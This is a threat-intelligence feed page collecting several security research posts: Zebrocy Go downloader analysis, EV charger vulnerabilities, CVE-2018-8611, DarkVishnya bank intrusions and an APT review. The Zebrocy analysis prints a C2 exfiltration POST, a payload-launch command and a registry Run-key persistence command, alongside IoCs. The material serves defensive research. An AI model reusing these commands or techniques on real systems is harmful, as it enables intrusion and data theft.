Malware Alerts

Subscribe to Malware Alerts feed Malware Alerts
Updated: 2 min 47 sec ago

A Zebrocy Go Downloader

Fri, 01/11/2019 - 05:00

Last year at SAS2018 in Cancun, Mexico, “Masha and these Bears” included discussion of a subset of Sofacy activity and malware that we call “Zebrocy”, and predictions for the decline of SPLM/XAgent Sofacy activity coinciding with the acceleration of Zebrocy activity and innovation. Zebrocy was initially introduced as a Sofacy backdoor package in 2015, but the Zebrocy cluster has carved a new approach to malware development and delivery to the world of Sofacy. In line with this approach, we will present more on this Zebrocy innovation and activity playing out at SAS 2019 in Singapore.

Our colleagues at Palo Alto recently posted an analysis of Zebrocy malware. The analysis is good and marked their first detection of a Zebrocy Go variant as October 11, 2018. Because there is much to this cluster, clarifying and adding to the discussion is always productive.

Our original “Zebrocy Innovates – Layered Spearphishing Attachments and Go Downloaders” June 2018 writeup documents the very same downloader, putting the initial deployment of Zebrocy Go downloader activity at May 10, 2018. And while the targeting in the May event was most likely different from the October event, we documented this same Go downloader and same C2 was used to target a Kyrgyzstan organization. Also interesting is that the exact same system was a previous Zebrocy target earlier in 2018. So, knowing that this same activity is being reported on as “new” six months later tells us a bit about the willingness of this group to re-use rare components and infrastructure across different targets.

While they are innovating with additional languages, as we predicted in early 2018, their infrastructure and individual components may have more longevity than predicted. Additionally, at the beginning of 2018, we predicted the volume of Zebrocy activity and innovation will continue to increase, while the more traditional SPLM/XAgent activity will continue to decline. Reporting on SPLM/XAgent certainly has followed this course in 2018 as SPLM/XAgent detections wind down globally, as has Sofacy’s use of this malware from our perspective.

Much of the content below is reprinted from our June document.

The Sofacy subset we identify as “Zebrocy” continues to target Central Asian government related organizations, both in-country and remote locations, along with a new middle eastern diplomatic target. And, as predicted, they continue to build out their malware set with a variety of scripts and managed code. In this case, we see new spearphishing components – an LNK file maintaining powershell scripts and a Go-implemented system information collector/downloader. This is the first time we have observed a well-known APT deploy malware with this compiled, open source language “Go”. There is much continued recent Zebrocy activity using their previously known malware set as well.

Starting in May 2018, Zebrocy spearphished Central Asian government related targets directly with this new Go downloader. For example, the attachment name included one “30-144.arj” compressed archive, an older archiver type handled by 7zip, Rar/WinRAR, and others. Users found “30-144.exe” inside the archive with an altered file icon made to look like the file was a Word document (regardless of the .exe file extension). And in a similar fashion in early June, Zebrocy spearphished over a half-dozen accounts targeting several Central Asian countries’ diplomatic organizations with a similar scheme “2018-05-Invitation-Letter(1).rar//2018-05-Invitation-Letter(pril).docx”, sending out a more common Zebrocy Delphi downloader.

In other cases, delivery of the new Go downloader was not straightforward. The new Go downloader also was delivered with a new spearphishing object that rolls up multiple layers of LNK file, powershell scripts, base64 encoded content, .docx files and the Go downloader files. The downloader is an unusually large executable at over 1.5mb, written to disk and launched by a powershell script. So the attachment that arrived over email was large.
The powershell script reads the file’s contents from a very large LNK file that was included as an email attachment, and then writes it to disk along with a Word document of the same name. So, launching the downloader is followed with the opening of an identically named decoy word document with “WINWORD.EXE” /n “***\30-276(pril).docx” /o”. The downloader collects a large amount of system information and POSTs it to a known Zebrocy C2, then pulls down known Zebrocy Delphi payload code, launches it, and deletes itself.

We observed previous, somewhat similar spearphishing scenarios with an archive containing .LNK, .docx, and base64 encoded executable code, delivering offensive Finfisher objects in separate intrusion activity clusters. This activity was not Sofacy, but the spearphishing techniques were somewhat similar – the layered powershell script attachment technique is not the same, but not altogether new.

And, it is important to reiterate that these Central Asian government and diplomatic targets are often geolocated remotely. In the list of target geolocations, notice countries like South Korea, the Netherlands, etc. In addition to Zebrocy Go downloader data, this report provides data on various other observed Zebrocy malware and targets over the past three months.

Spreading

Mostly all observed Zebrocy activity involves spearphishing. Spearphish attachments arrive with .rar or .arj extensions. Filename themes include official government correspondence invitations, embassy notes, and other relevant items of interest to diplomatic and government staff. Enclosed objects may be LNK, docx, or exe files.

A decoy PDF that directly targeted a Central Asian nation is included in one of the .arj attachments alongside the Go downloader. The content is titled “Possible joint projects in cooperation with the International Academy of Sciences” and lists multiple potential projects requiring international cooperation with Tajikistan and other countries. This document appears to be a legitimate one that was stolen, created mid-May 2018. While we cannot reprint potentially leaked information publicly, clearly, the document was intended for a Russian-language reader.

Powershell launcher from within LNK

The LNK containing two layers of powershell script and base64 encoded content is an unusual implementation – contents from a couple are listed at the technical appendix. When opened, the script opens the shortcut file it is delivered within (“30-276(pril).docx.lnk”), pulls out the base64 encoded contents (in one case, from byte 3507 to byte 6708744), base64 decodes the content and another layer of the same powershell decoding. This script writes two files to disk as “30-276(pril).exe” and “30-276(pril).docx” and opens both files, leading to the launch of the Go language system information collector/downloader and a decoy Word document.

Go System Information Collector/Downloader

Md5              333d2b9e99b36fb42f9e79a2833fad9c
Sha256         fcf03bf5ef4babce577dd13483391344e957fd2c855624c9f0573880b8cba62e
Size              1.79mb (upx packed – 3.5mb upx unpacked)
CompiledOn Stomped (Wed Dec 31 17:00:00 1969)
Type             PE 32-bit Go executable
Name           30-276(pril).exe

This new Go component not only downloads and executes another Zebrocy component, but it enumerates and collects a fair amount of system data for upload to its C2, prior to downloading and executing any further modules. It simply collects data using the systeminfo utility, and in turn makes a variety of WMI calls.

After collecting system information, the backdoor calls out to POST to its hardcoded C2, in this case a hardcoded IP/Url. Note that the backdoor simply uses the default Go user-agent:
“POST /technet-support/library/online-service-description.php?id_name=345XXXD5
HTTP/1.1
Host: 89.37.226.148
User-Agent: Go-http-client/1.1”

With this POST, the module uploads all of the system information it just gathered with the exhaustive systeminfo utility over http: hostname, date/time, all hardware, hotfix, service and software information.

The module then retrieves the gzip’d, better known Zebrocy dropper over port 80 as part of an encoded jpg file, writes it to disk, and executes from a command line:
“cmd /C c:\users\XXX\appdata\local\Identities\{83AXXXXX-986F-1673-091A-02XXXXXXXXXX}\w32srv.exe”
and adds a run key persistence entry with the system utility reg.exe:
cmd /C “reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Driveupd /d
c:\users\XXX\appdata\local\Identities\{83AXXXXX-986F-1673-091A-02XXXXXXXXXX}\w32srv.exe /f”

Zebrocy AutoIT Dropper

Md5              3c58ed6913593671666283cb7315dec3
Sha256         96c3700ad639faa85982047e05fbd71c3dfd502b09f9860685498124e7dbaa46
Size              478.5kb (upx-packed)
Compiled     Fri Apr 27 06:40:32 2018
Type             PE32 AutoIT executable
Path, Name  appdata\Identities\{83AF1378-986F-1673-091A-02681FA62C3B}\w32srv.exe

This AutoIT dropper writes out a Delphi payload, consistent with previous behavior going back to November 2015, initially described in our January 2016 report “Zebrocy – Sofacy APT Deploys New Delphi Payload”.

Zebrocy Delphi Payload

Md5               2f83acae57f040ac486eca5890649381
Sha256          f9e96b2a453ff8922b1e858ca2d74156cb7ba5e04b3e936b77254619e6afa4e8
Size               786kb
Compiled       Fri Jun 19 16:22:17 1992 (stomped/altered)
Type              PE32 exe [v4.7.7] Path, Name   c:\ProgramData\Protection\Active\armpro.exe

Interestingly the final payload reverts back to an earlier version [v4.7.7]. A “TURBO” command is missing from this Zebrocy Delphi backdoor command list .
SYS_INFO
SCAN_ALL
SCAN_LIST
DOWNLOAD_DAY
DOWNLOAD_LIST
CREATE_FOLDER
UPLOAD_FILE
FILE_EXECUTE
DELETE_FILES
REG_WRITE_VALUE
REG_READ_VALUE
REG_DELETE_VALUE
REG_GET_KEYS_VALUES
REG_DELETE_KEY
KILL_PROCESS
CONFIG
GET_NETWORK
CMD_EXECUTE
DOWNLOAD_DATE
DELETE_FOLDER
UPLOAD_AND_EXECUTE_FILE
SCREENSHOTS
FILE_EXECUTE
SET_HIDDEN_ATTR
START
STOP
KILL_MYSELF

Infrastructure

Zebrocy backdoors are configured to directly communicate with IP assigned web server hosts over port 80, and apparently the group favors Debian Linux for this part of infrastructure: Apache 2.4.10 running on Debian Linux. A somewhat sloppy approach continues, and the group set up and configured one of the sites with digital certificates using a typical Sofacy-sounding domain that they have not yet registered: “weekpost.org”. Digital certificate details are provided in the appendix.

These “fast setup” VPS servers run in “qhoster[.]com” can be paid for with Webmoney, Bitcoin, Litecoin, Dash, Alfa Click, Qiwi, transfers from Sberbank Rossii, Svyaznoy, Promsvyazbank, and more. Although, it appears that Bitcoin and Dash may be of the most interest to help ensure anonymous transactions. Dataclub provides similar payment methods:

One of the VPS IP addresses (80.255.12[.]252) is hosted in the “afterburst[.]com”/Oxygem range. This service is the odd one out and is unusual because it only supports VISA/major credit cards and Paypal at checkout. If other payment options are provided, they are not a part of the public interface.

Victims and Targeting

Zebrocy Go downloader 2018 targets continue to be Central Asian government foreign policy and administrative related. Some of these organizations are geolocated in-country, or locally, and some are located remotely. In several cases, these same systems have seen multiple artefacts from Zebrocy over the course of 2017 and early 2018:
• Kazakhstan
• Kyrgyzstan
• Azerbaijan
• Tajikistan

Additional recent Zebrocy target geo-locations (targeting various Central Asian/ex-USSR local and remote government locations):
• Qatar
• Ukraine
• Czech Republic
• Mongolia
• Jordan
• Germany
• Belgium
• Iran
• Turkey
• Armenia
• Afghanistan
• South Korea
• Turkmenistan
• Kazakhstan
• Netherlands
• Kuwait
• United Arab Emirates
• Spain
• Poland
• Qatar
• Oman
• Switzerland
• Mongolia
• Kyrgyzstan
• United Kingdom

Attribution

Zebrocy activity is a known subset of Sofacy activity. We predicted that they would continue to innovate within their malware development after observing past behavior, developing with Delphi, AutoIT, .Net C#, Powershell, and now “Go” languages. Their continued targeting, phishing techniques, infrastructure setup, technique and malware innovation, and previously known backdoors help provide strong confidence that this activity continues to be Zebrocy.

Conclusions

Zebrocy continues to maintain a higher level of volume attacking local and remote ex-USSR republic Central Asian targets than other clusters of targeted Sofacy activity. Also interesting with this Sofacy sub-group is the innovation that we continue to see within their malware development. Much of the spearphishing remains thematically the same, but the remote locations of these Central Asian targets are becoming more spread out – South Korea, Netherlands, etc. While their focus has been on Windows users, it seems that we can expect the group to continue making more innovations within their malware set. Perhaps all their components will soon support all OS platforms that their targets may be using, including Linux and MacOS. Zebrocy spearphishing continues to be characteristically higher volume for a targeted attacker, and most likely that trend will continue.
And, as their spearphishing techniques progress to rival Finfisher techniques without requiring zero-day exploitation, perhaps Zebrocy will expand their duplication of more sources of open source spearphishing techniques.

IoC

Go downloader
333d2b9e99b36fb42f9e79a2833fad9c

IPs
80.255.12.252
89.37.226.148
46.183.218.34
185.77.131.110
92.114.92.128

URLs
/technet-support/library/online-service-description.php?id_name=XXXXX
/software-apptication/help-support-apl/getidpolapl.php

File – paths and names
30-276(pril).exe
30-144-(copy).exe
Embassy Note No.259.docx.lnk
2018-05-Invitation-Letter(1).rar//2018-05-Invitation-Letter(pril).docx

The world’s southernmost security conference

Thu, 01/10/2019 - 05:00

When asked about his best race, Ayrton Senna replied that it was when he raced karting cars. For him it was the best because it was only for the sake of sports and free from commercial sponsoring and commercial interests. I have this same feeling about computer security conferences, because they attract people who really seek knowledge, both to receive and to share it.

In November I had the privilege of participating in a conference that can rightfully be labelled the world’s southernmost. It is called “Patagonia Hacking” and it is organized in the Chilean city of Punta Arenas: https://www.patagoniasec.cl

This event develops in two days – the first is dedicated to workshops, and the second is for presentations to the attendants. On my part, I had the opportunity to present two topics, one each day. On the day dedicated to conferences, my topic was the “Black Box” attacks against financial institutions in Latin America – a phenomenon that has become a fearful reality for the banks in the region.

Although the event took place in a remote city, attendants included enthusiasts from all over the world. There also were some Latin American speakers.

Despite the low temperatures and strong winds, the event’s welcome was very warm. It was very pleasant meeting the region’s new experts and sharing with them during those busy days.

The third edition of the event took place this year. If you plan to participate next year, apart from the conference, you should try the traditional lamb meat, Calafate beer and Calafate’s pisco sour, as well as making time to visit the Strait of Magellan Park which includes Fort Bulnes.

P.S. A curious fact – it seems that the southernmost city with Uber also happens to be Punta Arenas.

Remotely controlled EV home chargers – the threats and vulnerabilities

Thu, 12/13/2018 - 05:00

We are now seeing signs of a possible shift in the field of personal transport. Recent events such as the ‘dieselgate’ scandal undermine customer and government confidence in combustion engines and their environmental safety. At the same time there has been a big step forward in the development of electric vehicles. In addition to favorable media coverage, modern EVs have evolved a lot in terms of battery endurance, driving speeds and interior and exterior design.

To stimulate growth in the personal EV segment some countries even have special tax relief programs for EV owners. But there is still a major problem – the lack of charging infrastructure. This may not be as relevant in big cities, but in other places car owners mostly rely on their own home EV chargers, a relatively new class of device that has attracted our attention.

There are lots of home charger vendors. Some of them, such as ABB or GE, are well-known brands, but some smaller companies have to add ‘bells and whistles’ to their products to attract customers. One of the most obvious and popular options in this respect is remote control of the charging process. But from our point of view this sort of improvement can make chargers an easy target for a variety of attacks. To prove it we decided to take one of them, ChargePoint Home made by ChargePoint, Inc., and conduct some in-depth security research.

ChargePoint Home supports both Wi-Fi and Bluetooth wireless technologies. The end user can remotely control the charging process with a mobile application available for both iOS and Android platforms. All that’s needed is to register a new account in the application, connect a smartphone to the device via Bluetooth, set the parameters of a Wi-Fi network for an internet connection, and finish the registration process by sending the created user ID and the smartphone’s GPS coordinates to the backend from the device.

In a registered state, the device establishes a connection to the remote backend server, which is used to transfer the user’s commands from the application. The application thereby makes it possible to remotely change the maximum consumable current and to start and stop the charging process.

To explore the registration data flows in more detail, we used a rooted smartphone with the hcidump application installed. With this application, we were able to make a dump of the whole registration process, which can later be viewed in Wireshark.

The Bluetooth interface is only used during the registration phase and disabled afterwards. But we found another, rather unusual wireless communication channel that is implemented by means of photodiode on the device side and photoflash on the smartphone side. It seems to have just one purpose: by playing a special blinking pattern on the flash, the application can trigger the factory reset process after the device’s next reboot. During the reboot, Wi-Fi settings and registered user information will be wiped.

In addition, we found a web server with enabled CGI on the device. All web server communications are protected by the SSL protocol with the same scheme as the control server, so the web server inherits the described certificate security issue. We discovered a series of vulnerabilities in CGI binaries that can be used by an intruder to gain control of the device. Two of them were found in the binary used to upload files in different folders to the device depending on the query string parameters. Other vulnerabilities (stack buffer overflow) were found in the binary used to send different commands to the charger in the vendor-specific format (included in a POST message body). We also found the same stack buffer overflow vulnerabilities in the other binary used for downloading different system logs from the device. All this presents attackers with an opportunity to control the charging process by connecting to the target’s Wi-Fi network.

Vulnerabilities in the Bluetooth stack were also found, but they are all minor due to the limited use of Bluetooth during regular device operation.

We can see two major capabilities an intruder can gain from a successful attack. They will be able to:

  • Adjust the maximum current that can be consumed during charging. As a result, an attacker can temporarily disable parts of the user’s home electrical system or even cause physical damage – for example, if the device is not connected properly, a fire could start due to wires overheating.
  • Stop a car’s charging process at any time, for example, restricting an EV owner’s ability to drive where they need to, and even cause financial losses.

We sent all our findings to ChargePoint, Inc. The vulnerabilities we discovered have already been patched, but the question remains as to whether there is any reason to implement wireless interfaces when there is no real need for them. The benefits they bring are often outweighed by the security risks they add.

Download “ChargePoint Home security research” (English, PDF)

Zero-day in Windows Kernel Transaction Manager (CVE-2018-8611)

Wed, 12/12/2018 - 03:00

Executive summary

In October 2018, our AEP (Automatic Exploit Prevention) systems detected an attempt to exploit a vulnerability in the Microsoft Windows operating system. Further analysis led us to uncover a zero-day vulnerability in ntoskrnl.exe. We reported it to Microsoft on October 29, 2018. The company confirmed the vulnerability and assigned it CVE-2018-8611. Microsoft just released a patch, part of its December update, crediting Kaspersky Lab researchers Boris Larin (Oct0xor) and Igor Soumenkov (2igosha) with the discovery.

This is the third consecutive exploited Local Privilege Escalation vulnerability in Windows we discovered this autumn using our technologies. Unlike the previously reported vulnerabilities in win32k.sys (CVE-2018-8589 and CVE-2018-8453), CVE-2018-8611 is an especially dangerous threat – a vulnerability in the Kernel Transaction Manager driver. It can also be used to escape the sandbox in modern web browsers, including Chrome and Edge, since syscall filtering mitigations do not apply to ntoskrnl.exe system calls.

Just like with CVE-2018-8589, we believe this exploit is used by several threat actors including, but possibly not limited to, FruityArmor and SandCat. While FruityArmor is known to have used zero-days before, SandCat is a new APT we discovered only recently. In addition to this zero-day and CHAINSHOT, SandCat also uses the FinFisher / FinSpy framework.

Kaspersky Lab products detected this exploit proactively through the following technologies:

  1. Behavioral detection engine and Automatic Exploit Prevention for endpoint products
  2. Advanced Sandboxing and Anti Malware engine for Kaspersky Anti Targeted Attack Platform (KATA)

Kaspersky Lab verdicts for the artifacts used in this and related attacks are:

  • HEUR:Exploit.Win32.Generic
  • HEUR:Trojan.Win32.Generic
  • PDM:Exploit.Win32.Generic
Brief details – CVE-2018-8611 vulnerability

CVE-2018-8611 is a race condition that is present in the Kernel Transaction Manager due to improper processing of transacted file operations in kernel mode.

This vulnerability successfully bypasses modern process mitigation policies, such as Win32k System call Filtering that is used, among others, in the Microsoft Edge Sandbox and the Win32k Lockdown Policy employed in the Google Chrome Sandbox. Combined with a compromised renderer process, for example, this vulnerability can lead to a full Remote Command Execution exploit chain in the latest state-of-the-art web-browsers.

We have found multiple builds of exploit for this vulnerability. The latest build includes changes to reflect the latest versions of the Windows OS.

A check for the latest build at the time of discovery: Windows 10 Redstone 4 Build 17133

Similarly to CHAINSHOT, this exploit heavily relies on the use of C++ exception handling mechanisms with custom error codes.

To abuse this vulnerability exploit first creates a named pipe and opens it for read and write. Then it creates a pair of new transaction manager objects, resource manager objects, transaction objects and creates a big number of enlistment objects for what we will call “Transaction #2”. Enlistment is a special object that is used for association between a transaction and a resource manager. When the transaction state changes associated resource manager is notified by the KTM. After that it creates one more enlistment object only now it does so for “Transaction #1” and commits all the changes made during this transaction.
After all the initial preparations have been made exploit proceeds to the second part of vulnerability trigger. It creates multiple threads and binds them to a single CPU core. One of created threads calls NtQueryInformationResourceManager in a loop, while second thread tries to execute NtRecoverResourceManager once. But the vulnerability itself is triggered in the third thread. This thread uses a trick of execution NtQueryInformationThread to obtain information on the latest executed syscall for the second thread. Successful execution of NtRecoverResourceManager will mean that race condition has occurred and further execution of WriteFile on previously created named pipe will lead to memory corruption.


Proof of concept: execution of WriteFile with buffer set to 0x41

As always, we provided Microsoft with a proof of concept for this vulnerability, along with source code. And it was later shared through Microsoft Active Protections Program (MAPP).

More information about SandCat, FruityArmor and CVE-2018-8611 is available to customers of Kaspersky Intelligence Reports. Contact: intelreports@kaspersky.com

DarkVishnya: Banks attacked through direct connection to local network

Thu, 12/06/2018 - 05:00

While novice attackers, imitating the protagonists of the U.S. drama Mr. Robot, leave USB flash drives lying around parking lots in the hope that an employee from the target company picks one up and plugs it in at the workplace, more experienced cybercriminals prefer not to rely on chance. In 2017-2018, Kaspersky Lab specialists were invited to research a series of cybertheft incidents. Each attack had a common springboard: an unknown device directly connected to the company’s local network. In some cases, it was the central office, in others a regional office, sometimes located in another country. At least eight banks in Eastern Europe were the targets of the attacks (collectively nicknamed DarkVishnya), which caused damage estimated in the tens of millions of dollars.

Each attack can be divided into several identical stages. At the first stage, a cybercriminal entered the organization’s building under the guise of a courier, job seeker, etc., and connected a device to the local network, for example, in one of the meeting rooms. Where possible, the device was hidden or blended into the surroundings, so as not to arouse suspicion.

High-tech tables with sockets are great for planting hidden devices

The devices used in the DarkVishnya attacks varied in accordance with the cybercriminals’ abilities and personal preferences. In the cases we researched, it was one of three tools:

  • netbook or inexpensive laptop
  • Raspberry Pi computer
  • Bash Bunny, a special tool for carrying out USB attacks

Inside the local network, the device appeared as an unknown computer, an external flash drive, or even a keyboard. Combined with the fact that Bash Bunny is comparable in size to a USB flash drive, this seriously complicated the search for the entry point. Remote access to the planted device was via a built-in or USB-connected GPRS/3G/LTE modem.

At the second stage, the attackers remotely connected to the device and scanned the local network seeking to gain access to public shared folders, web servers, and any other open resources. The aim was to harvest information about the network, above all, servers and workstations used for making payments. At the same time, the attackers tried to brute-force or sniff login data for such machines. To overcome the firewall restrictions, they planted shellcodes with local TCP servers. If the firewall blocked access from one segment of the network to another, but allowed a reverse connection, the attackers used a different payload to build tunnels.

Having succeeded, the cybercriminals proceeded to stage three. Here they logged into the target system and used remote access software to retain access. Next, malicious services created using msfvenom were started on the compromised computer. Because the hackers used fileless attacks and PowerShell, they were able to avoid whitelisting technologies and domain policies. If they encountered a whitelisting that could not be bypassed, or PowerShell was blocked on the target computer, the cybercriminals used impacket, and winexesvc.exe or psexec.exe to run executable files remotely.

Verdicts

not-a-virus.RemoteAdmin.Win32.DameWare
MEM:Trojan.Win32.Cometer
MEM:Trojan.Win32.Metasploit
Trojan.Multi.GenAutorunReg
HEUR:Trojan.Multi.Powecod
HEUR:Trojan.Win32.Betabanker.gen
not-a-virus:RemoteAdmin.Win64.WinExe
Trojan.Win32.Powershell
PDM:Trojan.Win32.CmdServ
Trojan.Win32.Agent.smbe
HEUR:Trojan.Multi.Powesta.b
HEUR:Trojan.Multi.Runner.j
not-a-virus.RemoteAdmin.Win32.PsExec

Shellcode listeners

tcp://0.0.0.0:5190
tcp://0.0.0.0:7900

Shellcode connects

tcp://10.**.*.***:4444
tcp://10.**.*.**:4445
tcp://10.**.*.**:31337

Shellcode pipes

\\.\xport
\\.\s-pipe

APT review of the year

Wed, 12/05/2018 - 09:00

What were the most interesting developments in terms of APT activity throughout the year and what can we learn from them?

Not an easy question to answer; everybody has partial visibility and it’s never possible to really understand the motivations of some attacks or the developments behind them. Still, with the benefit of hindsight, let’s try to approach the problem from different angles to get a better understanding of what went on.

On big actors

There are a few ‘traditional’ actors that are very well known to the security community and that everybody has been tracking for the last few years. It has been business as usual for these actors in 2018 or, if anything, perhaps slightly quieter than usual.

In reality, it is the doctrines and modi operandi of these groups that determine how they react in the event of their operations becoming public knowledge. Some actors will simply abort their campaign and go into clean-up mode, while others carry on as normal. In order to do so, it is common for some of these actors to simultaneously work on several sets of activity. This allows them to compartmentalize operations, and if they are discovered, they simply improve their toolset to avoid detection next time.

We traditionally find many Russian-speaking actors in this second group, and we would like to highlight the 2018 activity of Sofacy, Turla and CozyBear.

Sofacy was probably the most active of the three. Throughout the year we detected it in various operations, updating their toolset and being blamed by authorities for several past operations. We have seen the actor deploying Gamefish and an updated version of its DealersChoice framework against embassies and EU agencies. One of the most high-profile incidents was abuse of Computrace LoJack by this actor in order to deploy its malware on victim machines, in what can be considered a UEFI-type rootkit.

Zebrocy is one of the tools traditionally used by this actor, but in reality the collection of cases where this tool was used can be considered a subset of activity in its own right. We saw different improvements for Zebrocy’s subset, including a new custom collector/downloader, new VBA implementing anti-sandboxing techniques and new .NET modules.

During the year we understood that Sofacy appears to be changing at a structural level and is possibly already being split into different subgroups. With the OlympicDestroyer analysis we learnt that this highly sophisticated false flag operation was somehow related to Sofacy. However, we later observed more activity by the OlympicDestroyer subset in Europe and Ukraine, and it was then that we decided to treat it as the entity we call Hades.

Of particular interest is how, after the publication of the GreyEnergy set of activity that is believed to be a continuation of BlackEnergy/Sandworm, we found additional overlaps between GreyEnergy and Zebrocy, including the use of the same infrastructure and the same 0-day for ICS.

All that seems to link this new Hades actor with the Zebrocy subset of activity, traditionally attributed to Sofacy, as well as part of the BlackEnergy/GreyEnergy/Sandworm cluster.

Regarding Turla, we didn’t spot any big structural changes like those described above, though we did see this actor using some interesting implants such as LightNeuron (targeting Exchange servers as described in our previous APT summary for Q2), as well as a new backdoor that, according to ESET, infected Germany’s Federal Foreign Office in 2017, as well as other entities in the European Union.

We discovered this actor using a new variant of its Carbon malware in its traditional activity of targeting embassies and foreign affairs institutions throughout the year. It also started using a new framework that we call Phoenix, as well as (unsurprisingly) transitioning to scripting and open source tools for its lateral movement stage.

Finally, some potential CozyDuke activity was detected during November 2018, apparently targeting diplomatic and governmental entities in Europe. The TTPs do not seem to be those that are usually attributed to this actor, which opened the door to speculation about this malware being used by a different group. The facts still seem to confirm that the malware used is attributable to CozyDuke. We are still investigating this new campaign by an actor that has been inactive for months.

It’s also worth mentioning Lazarus and BlueNoroff activity in 2018. We observed constant activity from this group targeting different regions including Turkey, other parts of Asia and Latin America, as well as various lines of business that provide it with financial gain, such as casinos, financial institutions and cryptocurrencies. In its more recent campaigns it has started deploying a new malware we call ThreatNeedle.

On false flags

It comes as no surprise to find false flags every now and again, sometimes implemented rather naively. But this year we witnessed what should be considered (so far) the mother of all false flags (more details can be found here). Other than the technical details themselves, what is also worth considering is the real purpose of this attack, and why these sophisticated false flags were planted in the malware.

The first obvious conclusion is that attackers now understand very well what techniques are used by the security industry to attribute attacks, so they have abused that knowledge to fool security researchers. Another consideration is that the main objective of an attack is not necessarily related to stealing information or disrupting operations – imitating an attacker might be more important.

This may actually be part of what some actors are doing at the moment. There are several groups that were apparently inactive for some time but now appear to be back. However, they are using different TTPs that are not necessarily better. As we shall see later, a couple of examples may be CozyDuke and APT10. As a purely speculative thought, it might be that their traditional toolset is now being used by different groups, maybe still related to the original operators. The purpose might be to make attribution more difficult in the future, or simply to distract from their real ongoing operations.

The whole OlympicDestroyer story eventually resulted in the discovery of a new subset of activity related to both Sofacy and BlackEnergy that we call Hades. We will see how these more sophisticated false flags evolve in the future and how they are used to pursue less explicit goals.

On the forgotten ones

Throughout the year we also saw how several old ‘friends’ re-emerged from hibernation with new sets of activity. Here we are talking about several well-known actors that for unknown reasons (a lack of visibility might be one of them) didn’t display much activity in recent times. However, it seems they are back. In some cases they appear in different weaker forms, perhaps with different operators, or just pretending not to be in shape while they run other parallel operations; in others cases they are back with their usual capabilities.

We can summarize all this by dividing it up into the regions that showed most activity during the year. First place went to South East Asia, followed by the Middle East.

For South East Asia we can point to groups such as Kimsuky that developed a brand new toolset at the very beginning of the year, or activity that falls under the always difficult-to-attribute WinNTI ‘umbrella’. However, and most notably, we can highlight groups such as DarkHotel, LuckyMouse, or even APT10.

The OceanSalt campaign was attributed to APT10, though it’s not very clear how strong the connection is. It seems unlikely that this actor, after the public disclosure and so many years of no known activity, would return with anything that might be attributable to them. At the moment, this is difficult to assess.

LuckyMouse, the second Chinese-speaking group from this list, was very active all year. It hacked national data centers to deploy watering-hole attacks against high-profile victims in central Asia, used a driver signed by a Chinese security-related software developer, and is even suspected of being behind attacks against Oman immediately after the signing of a military agreement with India.

Scarcruft used a new backdoor we call PoorWeb, deployed a 0-day in their campaign at the beginning of the year and used Android malware specially designed for Samsung devices. DarkHotel was also back with a 0-day and new activity, targeting their traditional victims. We were able to establish a connection with a medium level of certainty between DarkHotel and the Konni/Nokki set of activity described by other vendors.

APT10 was especially active against Japanese victims, with new iterations of its malware, as was OceanLotus, which actively deployed watering holes targeting high-profile victims in South Asia with a new custom stager.

In the Middle East we observed groups such as Prince of Persia re-emerge with some activity, along with OilRig. We also detected new MuddyWaters activity, as well as GazaTeam, DesertFalcons and StrongPity among others deploying various campaigns in the region.

On the new kids

At the same time many new sets of activity emerged during the year that were also focused primarily on the Middle East and South East Asia.

This activity was driven by Asian actors such as ShaggyPanther, Sidewinder, CardinalLizard, TropicTrooper, DroppingElephant, Rancor, Tick group, NineBlog, Flyfox and CactusPete – all of them active in the region throughout the year. As a rule, these groups are not that technically advanced, using a variety of approaches to achieve their objectives. They are usually interested in regional targets, with their main objectives being governmental and also military.

In the Middle East we saw activity by LazyMerkaats, FruityArmor, OpParliament, DarkHydrus and DomesticKitten among others. Sets of activity such as that by the Gorgon group are a bit of an exception as they also target victims outside the region.

Finally, we also detected new sets of activity that show an apparent interest in eastern European countries and former Soviet republics. In this group we find DustSquad, ParkingBear and Gallmaker. The latter seems to be interested in overseas embassies as well as military and defense targets in the Middle East.

On the big fishes

Even if some of the activity previously described doesn’t seem that technically advanced, it doesn’t mean it isn’t effective. Looking back we can cite a few public cases where it looks like these attacks are returning to the days when attackers were after major strategic research or blueprints that might be of the interest to state-sponsored groups, and not just some random data.

We have several examples. For instance, APT15 was suspected of targeting a company providing services to military and technology departments of the UK government. Intezer provided extra details about the activity of this group, though it is not clear who the ultimate victim was.

TEMP.Periscope was suspected of hacking maritime organizations related to the South China Sea. It wasn’t the only case in which the industry was targeted, as later it was discovered an unknown actor attacked companies related to Italian naval and defense industries.

Groups such as Thrip showed a clear interest in targeting satellite communication companies and defense organizations in the US and South East Asia.

Finally, the US Naval Undersea Warfare Center was attacked, according to the Washington Post, by a group linked to the Chinese Ministry of State Security, resulting in the theft of 614GB of data and blueprints.

The re-emergence of some of these groups and their victims don’t seem to be a coincidence. Some observers might even see the return of these big targeted attacks as the end of some sort of tacit agreement.

We also observed several attacks against journalists, activists, political dissidents and NGOs around the world. Many of these attacks involved malware developed by companies that provide surveillance tools to governments.

For instance, NSO and its Pegasus malware was discovered in more than 43 countries according to an external investigation, showing that business in this field is blooming. On a darker note, there were reports on how Saudi dissidents and Amnesty International volunteers were targeted with this malware.

The Tibetan community was also specifically targeted with different malware families, including a Linux backdoor, PowerShell payloads, and fake social media to steal credentials.

Finally, CitizenLab provided details of a campaign where Sandvine and GammaGroup artifacts were used for surveillance through local ISPs in Egypt, Turkey and Syria.

On naming and shaming

This is clearly a new strategy, adopted as a defense mechanism and as a response to the attackers, in some cases being justice able to claim individual working for APT groups. This can later be used in diplomatic offensives and lead to tougher consequences at the state level. It seems that governments are no longer shy of making these attacks public and providing details of their investigations, while pointing fingers at the suspected attackers. This is an interesting development and we will see how it evolves in the future.

The end of the Obama-era cyber-agreement between the US and China could be the reason for the wave of Chinese-speaking groups making a comeback, as well as the targeting of some of the high-profile ‘big fishes’ described above. We saw how in this new period of hostility between the two countries, the US obtained the extradition from Belgium of a Chinese intelligence officer charged with conspiring and attempting to commit economic espionage and steal trade secrets from multiple US aviation and aerospace companies.

The US also provided details about a North Korean citizen suspected of being part of the Lazarus group that was behind the Sony Entertainment attack and WannaCry activity, and who is now wanted by the FBI. Maybe in an unrelated note, the US Cert was very active during the year in providing indicators of compromise and detailing Lazarus (HiddenCobra) activity and the tools used by this actor.

After the infamous DNC hack, the US indicted 12 Russian citizens belonging to units 26165 and 74455 of the Russian Main Intelligence Directorate. Seven officers of GRU were also indicted for their alleged role in a campaign to retaliate against the World Anti-Doping Agency that exposed the Russian state-sponsored doping program.

In Europe, UK Officials and the UK National Cyber Security Center attributed the not-Petya attack that took place in June 2017 to Russian military units.

